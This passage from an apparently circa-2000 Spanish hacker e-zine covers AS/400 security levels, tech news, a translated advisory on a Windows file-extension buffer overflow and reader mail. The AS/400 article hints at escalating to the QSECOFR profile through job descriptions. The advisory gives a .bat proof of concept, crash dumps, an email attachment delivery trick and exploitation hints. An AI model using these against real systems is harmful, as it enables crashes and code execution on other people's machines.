OS/400 revoca automaticamente estas autorizaciones cuando cambiamos al nivel
30, y si el cambio de nivel no se planea bien, es posible algunos usuarios
pierdan los permisos que tienen para acceder a aplicaciones, bases de datos y
a algunas otras funciones del sistema.
Nivel de seguridad 40
"-------------------"
(God damn... Maybe i can..!!!)
El nivel de seguridad 40, se introdujo en el sistema a partir del OS/400 V1R3
(V1 --> Version 1.. R3 --> Release 3 para los que no sabian.). La necesidad
del nivel 40 se vio fundamentada en que en el S/38 existia algo que hacia
falta, y era necesario implementarla en el AS/400. La falencia en si es que
en el S/38 se permitia manipular Interfaces de la Maquina (MI) a traves de
los lenguajes de programacion (Ie. El mismo MI, C/400 y Pascal), a traves de
la manipulacion de estas interfaces se podia acceder a objetos a los cuales
el usuario no estaba autorizado, esto lo hacian robando (utilizando) un
puntero (de memoria, llamenlo apuntador) desde un objeto que no estaba
asegurado. En otras palabras, un programa MIpodia acceder un objeto inseguro,
y utilizar su puntero autorizado como puerta a un objeto al cual no se esta
autorizado.
Siendo estas las cosas, entonces, el nivel 40 de seguridad adiciono seguridad
para mantener la integridad del Sistema Operativo. Estas las podemos en lo
siguiente:
Estados y restricciones de Dominio: Sin importar el nivel de seguridad, el
AS/400 clasifica todos los objetos (programas, archivos, librerias, etc..) en
uno de dos dominios, sistema o usuario. Todos los programas tambien tienen
un estado de asignacion, nuevamente usuario o sistema. El concepto de dominio
del objeto y estado de asignacion de programa trabajan en conjunto con el
nivel 40 de seguridad para cerrar el hueco (hole, asshole XDD), que existe en
la seguridad del 400 en otros niveles. En el nivel nivel 40, los programas
con asignacion de sistema pueden utilizar (manipular directamente a traves
de punteros) todos los objetos sin importar su dominio, y los programas
de asignacion de usuario unicamente pueden utilizar los objetos con dominio
de usuario.
En los niveles 10, 20 y 30, el sistema verifica los programas para que no
incumplan las reglas. Si las reglas se incumplen, el sistema no toma mas
accion que la de loggear la violacion. Pero sobre el nivel 40, el sistema
impide que se ejecuten programas que puedan saltarse esas reglas.
Bloqueo de Instrucciones MI: Bajo el nivel 40, el sistema restringe el acceso
a algunas instrucciones MI, incluyendo aquellas que se utilizan para crear
objetons con dominio del sistema, manipulacion de procesos o eventos, y
accesos a las bases de datos. El sistema tambien detecta cualquier intento de
crear (ojo he dicho CREAR) un programa que utilice esas instrucciones
reservadas, de hecho, el programa se puede escribir, pero no se puede
compilar. Cualquier intento de ejecutar un programa existente (por ejemplo
subirlo compilado a traves de FTP), que utilice instrucciones restringidas,
dara como resultado un error de programa. En los niveles inferiores, el
programa correra sin problema, pero sera escrito en los logs del sistema.
validacion de Inicio de programa: En los niveles de seguridad 40 y 50, un
intento de submitir un job (o trabajo), utilizando una descripcion de trabajo
que este asociada a un perfil de usuario por defecto al que la persona que
trato de ejecutar el trabajo no este autorizado, el trabajo, no se ejecutara.
Y igual que en los otros puntos, en los niveles de seguridad inferiores, el
sistema logueara el intento de ejecutar el trabajo, pero aun asi lo dejara
trabajar sin problema. En los niveles de seguridad 10, 20 y 30, los permisos
para el perfil de usuario por defecto en una descripcion de trabajo no son
necesarios, y esto abre un agujero de seguridad que puede ser aprovechada por
algun usuario que tenga permisos en una descripcion de trabajo que contenga
un perfil de usuario mas poderoso.
Jejeje, un poco enredado no..???, a ver tratare de explicarlo un poco mejor,
una descripcion de un trabajo es como su nombre lo indica, una descripcion
de un trabajo, para hacerlo mas claro, veamos un ejemplo.
Para ver una descripcion de un trabajo utilizamos el siguiente comando:
WRKJOBD JOBD(QSYS/QCTL)
Aqui estamos diciendo: trabajar con la descripcion de trabajo, del Job QCTL
de la biblioteca QSYS.
Aqui nos aparece una pantalla donde nos muestra el trabajo solicitado, en
este caso el QCTL, lo ubicamos con el cursor y utilizamos la opcion deseada
en este caso la 5, que es para mirar la descripcion. Como resultado obtenemos
la siguiente pantalla:
_____________________________________________________________________________
Visualizar Descripcion de Trabajo
Sistema: S102P8Z
Descripcion trabajo: QCTL Biblioteca: QSYS
Perfil usuario . . . . . . . . . . . . . . . . . : *RQD
Comprobacion sintaxis CL . . . . . . . . . . . . : *NOCHK
Retener en cola trabajos . . . . . . . . . . . . : *NO
Gravedad finalizacion . . . . . . . . . . . . . : 30
... Mas carreta... etc etc etc
... Para abajo..!! etc etc etc
_____________________________________________________________________________
Bueno, tiene mas opciones pero para no llenar la e-zine con pendejadas, solo
os pego la parte que necesitamos, la del perfil de usuario..
Como pueden ver, donde dice perfil de usuario hay un campo que dice *RQD,
pues bueno, ahi esta el punto... ese *RQD significa que se requiere un nombre
de usuario, ahora, vamos a lo siguiente, en ese campo se puede poner por
ejemplo el usuario QSECOFR (Yes... El oficial de Seguridad o root en otros
sistemas), entonces, imaginate que en nivel 30 un usuario cualquiera, ejecuta
un job que este definido para este usuario...
Jaaa, ya.. use your imagination..
Prevencion a la modificacion de programas: Todos los programas son creados,
con un SET (Hola SET Staff... pero no, no son ud's...) de bits de chequeo
calculados sobre el objeto del programa. Estos bits de chequeo le permiten
determinar al sistema cuando un programa que ha sido restaurado es identico
al original (que no orinal... bahhh ya me siento cansado... esa es la causa
de los chistes malos..!!!). Si la validacion del programa falla, entonces hay
otro intento de restaurarlo (en realidad no es restaurarlo en si, pero no se
como explicarlo, a ver llamesmoslo como una etapa de re-verificacion del
archivo fisico almacenado en una cinta)
Si este proceso se ejecuta normalmente, el fallo de la primera validacion es
logueado, y el archivo se restaura sin problema. Pero, si vuelve a fallar la
validacion, y el nivel de seguridad es 30 o menor, el programa se restaura
sin mayor complicacion (mala cosa). Pero si el nivel es 40 o mayor, el
programa se restaura, se adiciona una antrada a los logs, y el trabajo pasa a
ser propiedad de qdftown y los permisos publicos pasan a ser *exclude.
Con el nivel de seguridad 40, podemos "tratar" de evitar que alguien
introduzca en nuestro sistema algun troyano, o nos modifique programas del
sistema etc etc etc...
Ahora ya lo saben...
Buff, ya los dejo, estoy cansado... Ya son las 3.03 pm del dia siguiente de
cuando empece a escribir... sigo en la oficina.. al profesor le dio dolor de
muela y no tuvimos parcial de Calculo...
En fin...
El nivel de Seguridad 50, vendria siendo un articulo mas o menos igual de
largo a este, asi que lo dejo para la proxima edicion...
Ya Shao...
Taker
Bibliografia: www.ibm.com
Dudas, aclaraciones etc ... mmm .. mmm bahhh, parece que todos mis correos
estan fallando... >:-(
Use
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
a ver si funciona...
:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:
-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-
..--:: 13. Noticias del Mundo del Espectaculo ::--..
By ToniK
Chile: Dos nuevas E-Zines inundan el mercado chileno XDD se trara de NoKeyZ y
FyE Puedes encontrarlas en las siguientes URL's:
http://www.nokeyz.org
http://fye.vicio.org
Estas nuevas revistas se ven bastante prometedoras y dan nuevos aires al
underground Chileno.
Brasil: Computadora actua como juez.
Un grupo de magistrados brasile~os esta probando un programa informatico
denominado "Juez Electronico" que, segun sus dise~adores, esta en condiciones
de procesar los datos concretos de una infraccion o delito y proponer de
inmediato la sancion adecuada. El sistema ya ha sido rebautizado como
"Justicia Instantanea".
Con todo, los responsables de la iniciativa indican que el peculiar metodo no
aspira a sustituir la labor de los jueces, sino a facilitar y acelerar su
trabajo. En tal sentido, se destaca ademas que el sistema informatico solo
esta en condiciones de procesar preguntas logicas, carentes de todo elemento
subjetivo, y que requieran solo de un "si" o un "no" como respuesta. Con el
tiempo, la justicia llegara a consistir en tirar un dado, y resultar inocente
si te sale un 7.
-----------------------------------------------------------------------------
Virus I love U.
Un perverso un virus informatico, arraso ayer en Internet. El virus I love
you aparecio en Hong Kong tardo solo cinco horas en propagarse por los
ordenadores de Asia, Europa y America a traves del correo electronico.
Organismos como el Pentagono, CIA, Casa Blanca, parlamentos europeos y
ministerios, asi como empresas, instituciones financieras y medios de
comunicacion sufrieron la infeccion, que asombro a los expertos por su
velocidad de difusion. En el estado espa~ol resultaron afectados mas de
medio millon de maquinas publicas y particulares de empresas, bancos y
organismos oficiales. Este virus llega al ordenador en forma de mensaje de
correo electronico, atachado como archivo adjunto, y afecta a los usuarios de
Windows, especialmente al Outlook express, y al navegador Exploter, como no,
de la tristemente conocida casa Microchof.
Macintosh y Linux se libran pues de esta amenaza.
-----------------------------------------------------------------------------
Resurreccion de Amiga.
El ordenador amiga recibio un nuevo intento de resurreccion el pasado 1 de
Abril, en la feria de desarrolladores Amiga 2000, mostrando una nueva
maquina.
Esta plataforma cuenta con gran cantidad de seguidores en todo el mundo que
podrian comenzar a desarrollar aplicaciones para esta nueva encarnacion.
-----------------------------------------------------------------------------
Pilas ecologicas.
Motorola pondra en breve a la venta una peque~a bateria ecologica que se
alimenta de alcohol y podra utilizarse en portatiles, camaras, videoconsolas,
etc. No es necesario conectarla a cargadores, ya que al usar alcohol, se
recarga mediante recambios.
Este elemento junto con oxigeno, hace posible que se genere electricidad.
-----------------------------------------------------------------------------
AMD, procesador de 1,5 GHz a finales de a~o.
Antes de fin de a~o tendra en el mercado un chip que trabajara a una
velocidad de reloj de 1,5 GHz, un prototipo en el que se esta trabajando
actualmente y que recibe el nombre clave de Corvette.
Lo mas sorprendente de este nuevo prototipo es que sera el procesador que
lleven los ordenadores portatiles de la linea mobile Athlon, uno de los
sectores mas caros del mercado, y que sustituira por tanto al actual
procesador portatil Mustang.
Intel, por su parte, ha dicho que respondera a este nuevo chip con el
Willamette, un procesador que tambien funcionara a una velocidad de 1,5 GHz.
-----------------------------------------------------------------------------
Fabrican un robot-insecto destinado a espionaje militar.
Ingenieros de la Universidad de Vanderbilt, EEUU, han fabricado un robot con
forma de escarabajo que mide 7,5 centimetros y pesa 60 gramos y esta
especialmente dise~ado para misiones de espionaje militar.
El robot, que puede moverse en cualquier direccion y transmitir imagenes y
datos sobre lo que le rodea, forma parte de una investigacion financiada por
las Fuerzas Armadas de EEUU para el desarrollo de aparatos utilizables en
tareas de espionaje y defensa.
El robot tiene la talla de uno de los mayores insectos: el escarabajo
rinoceronte gigante, y no puede volar. Se desplaza a una velocidad de 30
centimetros por segundo y puede transportar 28 gramos de peso de equipo, lo
cual permite incorporar micro-camaras de video que pesan 15 gramos.
-----------------------------------------------------------------------------
Mensajes subliminales en DVD.
Un titular de una prestigiosa publicacion alemana anuncia que algunos DVD
podrian contener mensajes subliminales, como los que encontro un lector en la
pelicula" The march is over", tras convertirlo a formato video para pasarlo a
camara lenta.
En una de las escenas en que se producia una pelea entre padre e hijo,
aparecia el texto "Respeta a tus padres", y en otra de las escenas aparecian
otras como "No bebas y conduzcas" o "No a las armas de fuego en la escuela".
-----------------------------------------------------------------------------
Metallica continua en guerra con el programa Napster.
El grupo de heavy metal, Metallica, ha vuelto a la carga en su demanda contra
quienes copian su musica y presento una lista de 335.000 personas que han
utilizado para ello el sistema comercializado por la empresa Napster, que
opera desde la ciudad de San Mateo en el estado de California.
Lars Ulrich, se presento en las oficinas de Napster acompa~ado por el abogado
Howard King con la lista de los usuarios de Internet que intercambiaron
copias ilegales de su musica.
Napster utiliza un programa ideado por un estudiante que permite a buscadores
de musica electronica copiarla directamente desde el disco duro en que se
encuentra la copia original.
El servicio se ha popularizado entre estudiantes universitarios, pero ha
despertado las iras de las casas discograficas y artistas como los
componentes de Metallica y han declarado que siempre han permitido y animado
a sus aficionados a grabar sus actuaciones en directo.
Sin embargo, la posibilidad de copiar gratis grabaciones de estudio con
calidad digital sin pagar los ingresos por derechos de autor que les
corresponden es otra cosa muy distinta y no estan dispuestos a permitirlo.
http://www.napster.com
-----------------------------------------------------------------------------
Yahoo ofrece una manera de ubicar telefonos celulares
La compa~ia Yahoo de Europa presento un nuevo servicio que permitira
localizar al usuario de un telefono celular donde quiera que se encuentre.
La empresa dijo que el servicio "Find-A-Friend", lanzado junto a la compa~ia
de servicios telefonicos CellPoint Inc., solo funciona si el usuario del
telefono lo permite.
El servicio de Yahoo estara disponible en cualquier pais con la cadena movil
digital GSM, que incluye la mayoria de Europa, mediante el uso de telefonos
celulares comunes.
El destinatario puede elaborar una lista de personas que quiere que sepan
donde esta y tambien puede bloquear la informacion para no ser detectado.
El que hace la llamada recibe informacion sobre el lugar en el que se
encuentra su interlocutor y la distancia a la que se halla. Por ejemplo:
"John esta cerca de Picadilly Circus, unos 3,2 kilometros al noroeste de
usted".
Los operadores de redes ya saben donde esta usted y los anunciantes de
servicios moviles de Internet mueren por ubicarlo y poderle enviar
publicidad, pero la ley limita la forma en que esa informacion puede
utilizarse.
-----------------------------------------------------------------------------
Hackers contra la web de Apache
Hackers entraron a primeros de mayo en la web de la empresa de software
Apache solo clavaron un anuncio de la competencia, Microsoft, en una de sus
paginas a pesar de tener el control total de su servidor.
Hay hackers malos (que pertenecen a la "black hat category") y buenos
("white hat category").
Apache tuvo suerte porque el grupo de piratas que penetro en sus sistemas
podria haber literalmente arrasado toda su base de datos.
"Habria sido bonito que no hubieran puesto el maldito logo de Microsoft, pero
algo tenian que hacer para captar la atencion" comentaba Rasmus Lerdorf,
representante de la compa~ia.
Apache, que desarrolla el software de los servidores de web de mas del 60%
del mercado del mundo, esta seguido por Microsoft, que abarca un 21% del
mercado. Al igual que Linux, Apache ofrece a sus usuarios un codigo abierto
con el que puede modificar el software original.
Precisamente alli radica el problema de Apache: cualquier persona con
conocimientos informaticos puede instalar cuaquier tipo de s oftware en el
servidor que pueden afectar a los dierentes tipos de software que interactuan
en el funcionamiento.
Para solventar futuros accesos indeseados, Apache ha reducido el numero de
personas con privilegios de acceso a su servidor y ha cerrado dos puntos
debiles, que fueron por donde los white hats atacaron al servidor.
Lerdorf comento a la prensa que los hackers aprovecharon la presencia del
programa Bugzilla (un programa que sigue rastros de virus, por donde entro y
cuales fueron los ficheros afectados por orden de actuacion) en el server
para entrar y controlarlo gracias a un punto debil en el propio Bugzilla.
Por supuesto, la compa~ia ha quitado el acceso al programa.
Al terminar la conferencia de prensa, Lerdorf comentaba feliz por la minima
incidencia del ataque: "solo podemos acusarnos a nosotros mismos. Ha sido
embarazoso pero aprendimos la leccion".
-----------------------------------------------------------------------------
Trampa en Internet para cobrar con un 906 servicios eroticos
Los servicios informativos de CNN+ desvelaron la existencia de una trampa en
Internet para cobrar el acceso a servicios pornograficos con la tarifa de una
linea telefonica 906.
Los datos se~alan que tres empresas espa~olas proveedoras de contenidos
pornograficos anuncian que el usuario de Internet puede obtener material con
contenido erotico sin necesidad de pagar con tarjeta de credito.
Como condicion, los proveedores exigen que el usuario se baje un programa de
lared y lo ejecute.
En este proceso lo que realmente ocurre es que el programa cambia el telefono
con el que el usuario accede a Internet: en vez de la linea con tarifa local
que cree usar, el programa lo cambia por un numero que comienza por 906.
El usuario comienza asi a desembolsar alrededor de 120 pesetas por minuto
durante todo el tiempo de conexion, sin saberlo.
Esto plantea dos problemas legales. Por un lado, se cambia el telefono sin
que se avise suficientemente al usuario. Por otra parte, esas compa~ias
utilizan numeros 906 para ofrecer contenidos eroticos, cuando el Ministerio
de Fomento establecio que ese tipo de material solo puede ser ofrecido a
traves de los 903, que requieren una peticion expresa del titular del
telefono desde el que se accede para poder contactarlos.
-----------------------------------------------------------------------------
Delito Informatico y/o Control Global
Hispasec
Programas y conductas propias del mas puro hack se criminalizan con la nueva
legislacion.
Despues de tres a~os de trabajo realizado con bastante secreto, se ha hecho
publico por el Consejo de Europa, a finales del mes de abril, un borrador
para un primer Tratado Internacional sobre el delito informatico, tratado
que pretende aglutinar a mas de 40 paises, y que otorgara mayores poderes a
las policias de los estados firmantes para la persecucion e investigacion de
tales delitos.
Destaca, en el borrador del tratado la prohibicion, o mejor dicho,
criminalizacion de conductas como bajar desde una web, tambien publicar en
ella, o enviar por correo, cualquier programa "dise~ado o adaptado para
obtener acceso a un sistema informatico" o que "interfiera las funciones del
sistema".
El tratado permite a las autoridades el obligar al ciudadano a revelar sus
passwords y/o acceder informacion cifrada. Si desde hace tiempo es ya dificil
encontrar algun remailer verdaderamente anonimo, ahora ya sera casi
imposible, al menos dentro de la legalidad, aunque el nombre lo conserven
muchos de ellos, ya que se van a limitar los mismos y se obligara por ley a
los proveedores a guardar informacion sobre sus usuarios.
No solo eso, si no que los estados podran acceder a dicha informacion de los
Proveedores de Servicios. Se pretende dotar a la policia de una nueva
herramienta legal con la que hacer frente a los ataques y delitos
transnacionales, delitos que hasta el dia de hoy son de dificil persecucion,
entre otras cosas, por la falta de armonizacion de las diferentes
legislaciones implicadas.
El tratado tambien incluye un procedimiento para la extradicion, y el
establecimiento de grupos de apoyo entre las policias de los estados
firmantes.
Para finales de este a~o 2000 esta prevista la finalizacion de dicho tratado,
una vez finalizado por el Consejo de Europa se remitira a los paises para su
firma, si procediera.
-----------------------------------------------------------------------------
Nuevo agujero de seguridad en Hotmail
Hotmail, la compa~ia de Microsoft de correo Web gratuito y con mas de 50
millones de usuarios en todo el mundo, constituye un apetitoso bocado para
los hackers.
Un cazaagujeros llamado Bennett Haselton descubrio una vulnerabilidad que
permitia a un asaltante entrar en una cuenta de correo usando un mensaje de
correo con un fichero adjunto en HTML.
Cuando el usuario ve el fichero adjunto (lo cual sucede automaticamente en la
mayoria de lectores de correo actuales, incluidos los correos Web), se
interceptan sus cookies de autenticacion de Hotmail y se envian al sitio web
del atacante, de manera que en adelante este puede entrar en la cuenta de la
victima haciendo uso de las cookies robadas. El fichero HTML adjunto
incorpora codigo en JavaScript para robar las cookies, que no es filtrado por
Hotmail, ya que JavaScript solo se filtra en los mensajes de correo, pero no
en los ficheros adjuntos.
Hotmail reacciono con rapidez y soluciono el problema ayer mismo al poco
tiempo de ser informado.
Informacion adicional:
http://www.peacefire.org/security/hmattach/
:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:
-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-
..--:: 14. Bug ::--..
By Cucumber
Ya, ya se que ese no es el nombre real de esa seccion, que la seccion se debe
llamar bug'S con ese, pero es que resulta que el autor habitual de la misma
anda perdido y entonces le abrimos el turno a otro de los escritores habituales
de PR.
[NdE: Si, tambien se que el autor habitual de esta seccion soy yo, pero como
ven, tambien me ha agarrado la estudiadera, y queda poco tiempo libre para
dedicar a lo que me gusta asi que... prometo que la proxima la escribire yo]
Ahora dejo que Cucumber continue..
Puedo dejar esto como un aporte mio a la Proyecto_r 9, ya que no ando muy
brillante en cuanto a ideas... no se me ocurre nada, pero traduje esto que
me parecio interesante. Para la parte de los Bugs.
*****************************************************************************
Esto ya lleva unos dias en discusion. No quise decir nada hasta recopilar mas
informacion, que aca va. Me limito a traducir un advisory, que es este:
=====================================================================
Securax-SA-02 Security Advisory
belgian.networking.security Dutch
=====================================================================
Topic: several programs for Ms windows (all versions)seem to
contain a "fileextension"-overflow.
Announced: 2000-04-21
Updated: 2000-04-23
Affects: Ms windows98. And several programs for win in general
=====================================================================
I. Explorer.exe
Recientemente se descubrio un buffer overflow en versiones de Windows
95/98/2000/Nt del explorer.exe.
El Buffer overflow ocurre cuando tu creas un archivo con un nombre que
contiene mas de 129 caracteres en la extension.
Si pasas el mouse sobre el archivo (todo esto en el explorador de windows) y
el explorador intenta mostrar el nombre, ocurre el overflow.
Si la extension tiene muchos caracteres, puedes sobreescribir el EIP.
Si ocurre el overflow, aparecera algo asi:
EXPLORER caused an invalid page fault in
module at 0000:61616161.
Registers:
EAX=61616161 CS=0187 EIP=61616161 EFLGS=00010246
EBX=80070032 SS=018f ESP=01a1d8fc EBP=61616161
ECX=c16b6f10 DS=018f ESI=01d0bd3c FS=5047
EDX=81724974 ES=018f EDI=7fcbd320 GS=0000
Bytes at CS:EIP:
Stack dump:
61616161 61616161 61616161 61616161 61616161 61616161
61616161 61616161 61616161 61616161 61616161 61616161
61616161 61616161 61616161 61616161
Tambien se descubrio que con algunos codigos de ASCII en la extension, pudes
hacer pensar a windows que es un archivo protegido contra escritura o en uso,
lo que te imposibilita de borrarlo. Ni siquiera el querido DOS puede
borrarlo, ya que te dice que no encuentra el archivo.
En algunas versiones de Windows no ocurre el overflow.
En una lista de correos, John Swensson (
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
) dijo que si tu lo
usabas en Windows 2000 con una extension lo suficientemente larga, no podrias
borrar el archivo.
Probando en un Nt4, se descubrio que pueden pasar varias cosas:
1.- Se pudo borrar el archivo, pero nuna se fue a la papelera, como se supone
que debio haber pasado.
2.- No se pudo borrar el archivo, tampoco renombrarlo a un nombre mas simple
como 1.txt, por ejemplo. (Con errores que dependen del largo de la extension
del nombre del archivo. Cuando no se podia borrar el archivo, con el cmd.exe
si se pudo.)
Un archivo *.bat que cree el famoso archivo , podria ser asi:
---
ECHO Buffer overflow en explorer.exe de windows9x
dir *.* >
a.aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaa
ECHO puedes modificar la cantidad de a's entre 129 y 147 +/-
ECHO Cambiando el largo, varian los resultados.
ECHO Atte. Don Cucumber :)
---
El primer codigo del exploit para este problema fue publicado por Laurent
eschenauer <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
> y pronto puede ser encontrado en:
http://www.securax.org/data/longext-exploit.c
(al momento de escribir esto, aun no estaba disponible.)
II- Buffer Overflow en programas NO Microsoft.
Probado en:
WS_ftp : vulnerable
Eudora Pro 4.2: vulnerable : Visual C++ (NT4-w98)
mIRC 5.7: no vulnerable : Borland C++ (NT4)
frontpage : Se cae (NT4)
codewarrior: no vulnerable (NT4)
outlook express 5: no vulnerable (win2k)
windows commander's FTP: vulnerable al hacer download (NT4)
windows commander's FTP: NO vulnerable al hacer UPload (NT4)
cuteFTP3 : no vulnerable (win98)
outlook 2000 (win2k)
Para tratar de usar remotamente este bug, puedes enviarte un email a ti mismo
con el archivo como un attachment.
Si bajas tus emails con el Eudora Pro, este se caera repentinamente (probado
en un Windows 98).
Al caerse, tiro un error como este:
EUDORA caused an invalid page fault in
module EUDORA.EXE at 0187:00428b05.
Registers:
EAX=007f0394 CS=0187 EIP=00428b05 EFLGS=00010206
EBX=00000000 SS=018f ESP=007eff88 EBP=007f0764
ECX=006a305c DS=018f ESI=007f07a8 FS=582f
EDX=007eff8c ES=018f EDI=8173b024 GS=0000
Bytes at CS:EIP:
56 50 51 52 ff 15 50 9f 63 00 8b 15 80 2c 6b 00
Stack dump:
Tambien se noto que la cantidad de caracteres necesitados para hacer caer al
Eudora, es mayor que la necesaria para hacer caer al explorer de Windows 98.
NOTA: Cada vez que trates de accesar al directorio donde esta el attachement,
tu programa se caera.
En otro mail lei que editando el archivo in.mbx se podia arreglar esto.
Al usar el Windows Commander, cuando se trato de navegar en ese directorio,
este se cayo, saliendo lo siguiente:
Application Error
Exception EAccessViolation in module WINCMD32.EXE at 7F8B0736
Access violation at address 7FCB1946. Read of address 00580939
Scaneando con el scandisk no se encontraron errores.
Despues se hizo la misma pruebam pero en un NT y se noto que el Eudora Pro
tambien se caia y aparecia nuestro amigo... Dr. Watson.
WS_ftp tambien se cae al entrar a un directorio donde este este archivo.
Intentando subir y bajar este archivo con el windows commander, se noto que
el upload andaba ok, pero al hacer un download... buffer overflow.
Esto aumento las sospechas de que el problema estuviera en una libreria de
I/O de algun lenguaje de programacion popular.
Tambien lei de un espa~ol, con el cual estoy tratando de contactarme para que
me de mas detalles al respecto, que en su server tiene un antivirus que
revisa los attachments que llegan en los mails a ese servidor. Al pasar algun
mail con el famoso archivo, al cabo de un rato, el servidor se cae. Esto no
lo puedo confirmar ni decir que antivirus ni nada, pero apenas tenga
respuesta del espa~ol, se los hago saber.
III.- Impacto
Este tipo de ataque permite a cualquier usuario local o remoto con acceso a
la creacion de archivos, a correr codigos hostiles en el computador.
Si alguien escribe un peque~o codigo que baje y ejecute un troyano, esto
causaria mas de un problema!.
Esto podria usarse para tener acceso como 'root' (Admin..) a muchos
computadores con Windows.
La escritura de este codigo, puede ser engorrosa, porque nosotros estamos
manejando un nombre de archivo y no todos los codigos hexadecimales son
aceptados en un nombre de archivo.
Algunas pistas de 'exploteo':
Recuerda que tambien puedes poner algunos bytes en el mismo archivo, esto es,
elevando la cantidad inicial de bytes desde +/- 100 hasta un valor
virtualmente ilimitado.. Creo que esto significa, que no existe la necesidad
de realizar una descarga externa.
IV.- Solucion
Por ahora ninguna si se piensa seguir en Windows :P
Solo no bajes archivos que contengan nombres extremadamente largos cuando
puedas.
Deshabilita el 'auto download' de attachments si tu cliente de e-mail lo
soporta.
V. Creditos
Initial bug report : |ncubus -*- overflow detection + usage concepts
+ quickly written advisory by Zoa_Chien -*- Exploit shell-code :
Laurent eschenauer <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
> -*- Testers: Lamagra
/ nostalg1c / pathos / segfau|t -*- bug by microsoft -*- thnx to all
vuln-dev
replyers.. keep those replies coming !.
Version en ingles de este Texto:
Zoa_Chien,
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Ok.. eso es todo.. igual es harto, pero valio la pena la traduccion.
Se despide,
Don Cucumber
[NdE: Que hace un pobre Con Don...??? XDDDD]
:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:
-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-
..--:: 15. Ha llegado Mail ::--..
By CDLR
________________
/\ Proyecto R ./
___ / \ ."/ Ha llegado Mail
____ / \_______." / .-"-.-"-.-"-.-"-.
_____ /_______________/
Aqui esta nuevamente esta seccion que veces parece un tanto salida de tono
para algunos y muy graciosa para otros, en fin, hay que aclarar que no
siempre somos asi, normalmente buscamos nuestro peor dia para responder
los correos, asi que ya saben, las respuestas vienen dadas gracias a la ayuda
de nuestros jefes, compa~ero de trabajo, a nuestras esposas, profesores y
todas esas personas que de algun modo nos sacan de casillas.
Estan advertidos.. ;)
Taker.
-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-
Subject:
Date: Wed, 1 Jan 1997 21:16:38 -0400
From: "Manuel Ramirez S." <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
>
To: <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
>
hola
Soy de Temuco y me he tratado de inizializar en el HACK, pero me he dado
cuenta que casi todo el underworl gira en torno a LINUX o UNIX. he buscado
paginas de donde bajarlo pero no he encontrado ninguna fiable. me imagino
que al ser un operativo debe pesar kaleta. espero que me respondan
dandome un zite u otra forma algo mas efectiva de obtenerlo.
[No, no, no... estas equivocado, no todo el underwolrd gira en torno a Linux,
es solo que es un sistema operativo mas estable. Aunque tampoco es el mejor,
pero el resto lo tendras que descubrir... bahh, tanta carreta y no te he
dicho aun donde conseguirlo, prueba en alguna revista, pues como ahora Linux
esta de moda, esos pinches no pierden oportunidad, aunque simpre esta tmb
CDLR, disque regalan CD's de Red Hat.]
He leido su E-ZINE y me parece bastante buena como este pais.
Desde Temuco un
necesitado.
Z-CooL
[Buuff, ese nick me parece conocido... aunque no quiero entrar hoy en
discusiones de Nicks XDDD]
[PLX: Pues lo mismo .. hay muchas revista que viene con alguna version de
Linux pero si no mandame un correo a
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
y vere si te puedo
hacer llegar alguna copia del Red Hat]
-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-
Subject: lamentable...
Date: Tue, 14 Dec 1999 23:11:11 -0500 (EST)
From: Virkoff Hackerstein <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
>
To:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
estube dando vueltas por la pagina (www.cdlr.org) y vi como fueron de
idealista con lo currido con el muchachito simpatico del dr_fdisk o algo asi,
y me parecio super interesante la forma en que la represalia defendia el
verdadero espiritu del hacker, la idea de libertad de informacion, y todo lo
demas... cosa que me parece espectacular ya que me hace sentir que no soy el
unico en este ricon que cree en la libertad de internet...lo que me dejo
preocupado como en esa misma seccion de paginas hackeadas muestran el hack a
la de ricardo lagos.
[Lo de dr_fdisk, mmm, a mi no me miren, yo no hice nada, aunque pues... mmm,
estoy de acuerdo... incluso, creo que el tmabien, porque despues se disculpo,
pero eso es historia pasada. Lo de la pagina de Ricardo lagos, pues te cuento
que esa seccion estaba dedicada a mostrar paginas crackeadas "no por
nosostros", si no por otra gente, pero despues de un tiempo llegamos a la
conclusion que eso era fomentar de alguna forma el crackeo de paginas web,
por lo tanto decidimos sacarla de ahi...]
Eso no lo comparto, no solo por que mi tendecia politica va por ahi, sino que
el espiritu que defienden tanto queda por el suelo en las declaraciones
hechas en ese hack, lamentablemente nos vamos contra un extranjero tratandole
de enseqar netiqueta y en casa la cosa esta peor, no por el hecho de hackear
